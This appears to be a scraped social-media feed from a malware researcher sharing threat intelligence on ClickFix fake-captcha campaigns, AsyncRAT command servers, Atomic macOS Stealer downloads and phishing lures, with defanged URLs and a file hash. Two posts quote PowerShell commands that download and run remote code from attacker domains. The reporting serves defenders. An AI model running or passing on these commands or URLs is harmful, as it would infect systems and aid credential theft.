JAMESWT_WT Profile Banner
JAMESWT Profile
JAMESWT

@JAMESWT_WT

Followers
37K
Following
85K
Media
10K
Statuses
53K

#Independent #Malware #Hunter #CyberSecurity #InfoSec https://t.co/KCFBJcHHcW

Joined August 2015
Don't wanna be here? Send us removal request.
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
14 hours
"Disponibilização de documento".👇.rtoup-6391356-metaflux-xytrmnwl-246.libreconocimiento.]com/.👇.lpate-9829-ioayurew-jakritu-16.cheapuggsoutlet.]us/vai/notafiscal6.6.zip. Samples #PDQConnect #RustyStealer.Hunting 👇. cc @dodo_sec
Tweet media one
Tweet media two
Tweet media three
Tweet media four
1
5
18
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
13 hours
RT @ransomnews: 🚨 Mauritania Gov Job Cert platform breached. QCE platform hit in 12.8GB data leak: IDs, CVs, diplomas, contracts exposed. 1….
0
1
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
13 hours
RT @blackorbird: Breaking down the UserAssist artifact structure.UserAssist used to register the execution of GUI programs..
0
6
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
14 hours
RT @ShadowOpCode: 🚨 #OpenDir alert!. Stumbled upon a publicly exposed directory hosting a nice little malware stash:.👉EnergizerTrojan.👉Flam….
0
3
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
14 hours
RT @D3LabIT: ⚠️ Malware VipKeylogger in diffusione in #ItalianGP . Rilevata una nuova campagna via email:.📌 “RICHIESTA D’OFFERTA NR. 401/C”….
0
3
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
14 hours
RT @SquiblydooBlog: 1337 entries in Cert Central. This represents ~1300* unique code-signing certificates issued to cybercriminals for abus….
0
6
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
15 hours
RT @Fact_Finder03: #ClickFix active Domain : http[://185[.100.157.217:85. @500mk500 . #Xworm
Tweet media one
0
5
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
16 hours
Scadenza del servizio @serverplan .com. (Rinnova ora il tuo dominio [].). ⛔️https://renewalserviceplatform.]com/managehosting/pagamento.php?Autorizzazione#42050330
Tweet media one
Tweet media two
0
3
11
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
1 day
RT @ESETresearch: IoCs available on our GitHub: 7/7.
0
2
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
1 day
RT @ESETresearch: #ESETresearch has mapped the labyrinth of #AsyncRAT forks, identifying the most prevalent versions of this open-source ma….
0
32
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
RT @500mk500: @JAMESWT_WT @k3dg3 @skocherhan @guelfoweb @marsomx_ @AndreaDraghetti @VirITeXplorer @1ZRR4H @c_APT_ure @0xToxin @pr0xylife @D….
0
2
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
#Atomic #macOS #Stealer.👇. extra Samples. ✅ ✅ ✅ ✅
Tweet media one
0
0
4
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
👇.#AsyncRat .8fnuawbfuac.]click:8888.8eh18dhq9wd.]click:8888.8hdfiqowchq.]click:8888.8nioqhxciwoqc.]click:8888.8fhd2idhacas.]click:8888.
0
0
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
#booking #fakecaptcha #clickfix .👇.booking.hotel-statuspay.]com/sign-in?.👇.powershell -Command "iwr http://booknsvrf.]com/ -OutFile "$env:TEMP\x.hta"; . 👇#AsyncRat.booknsvrf.]com/sls/bdxnsmp.exe. Samples👇. cc @500mk500 @k3dg3
Tweet media one
Tweet media two
Tweet media three
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
#booking #fakecaptcha #clickfix.👇. https://admin-properties-captcha.]com/sign-in?.👇.powershell -Command "iex ((New-Object Net.WebClient).DownloadString(' https://bknpnt.]com/bkngpntqow'))". Samples👇. ▶️AnyRun. cc @500mk500 @k3dg3
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
6
19
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
#Atomic #macOS #Stealer Mentioned Samples.👇. 💯+ extra new samples from.👇.⛔️ https://isnimitz.]com/zxc/app.⛔️https://stanprinston.]com/zxc/app.zip.⛔️https://isnimitz.]com/zxc/app.zip
Tweet media one
@MarceloRivero
Marcelo Rivero
@MarceloRivero
2 days
Atomic macOS Stealer (#AMOS), a new variant, now adds a persistent backdoor. 🪝 Resident loader drops bot .🔧 Run bash cmds anytime .♻️ Re-run stealer on demand .💣 Self-delete remotely .🔑 Restore Gmail sessions via Chrome sync. Good samples catch in-the-wild & write-up by
Tweet media one
1
7
18
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
RT @MarceloRivero: Atomic macOS Stealer (#AMOS), a new variant, now adds a persistent backdoor. 🪝 Resident loader drops bot .🔧 Run bash c….
0
4
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
RT @spamhaus: 🤖 Jan-Jun 2025 Botnet Threat Update out now!. ⬆️ Total of 17,258 botnet C&Cs observed, up by +26%. ⬇️ Botnet C&Cs continue t….
0
13
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
RT @Unit42_Intel: Attackers are more frequently using Windows shortcut (LNK) files to distribute malware. We cover four main categories of….
0
57
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
RT @500mk500: @JAMESWT_WT @CyberGhost13337 @1nt3l_hunt @skocherhan + huhl5r.easypanel\.host with the same content.
Tweet media one
0
1
0
@JAMESWT_WT
JAMESWT
@JAMESWT_WT
2 days
From mentioned svg and related fakecaptcha html. http://206.189.189.]57/ #opendir .(malware and xxx image).👇. and. cc @CyberGhost13337 @1nt3l_hunt @skocherhan
Tweet media one
Tweet media two
@1nt3l_hunt
7ambola 🇵🇸
@1nt3l_hunt
2 days
Pivoting on a file named google-privacy-policy-Cb0CGVRT.svg was used in a ClickFix campaign. hash: 51da32d8582706c6229f9a548da21b9845cb51ee55736a252addcdf2b1df5848. @silentpush .@banthisguy9349.@RacWatchin8872.@SquiblydooBlog.@skocherhan.@500mk500.@volrant136.@smica83
Tweet media one
Tweet media two
1
5
14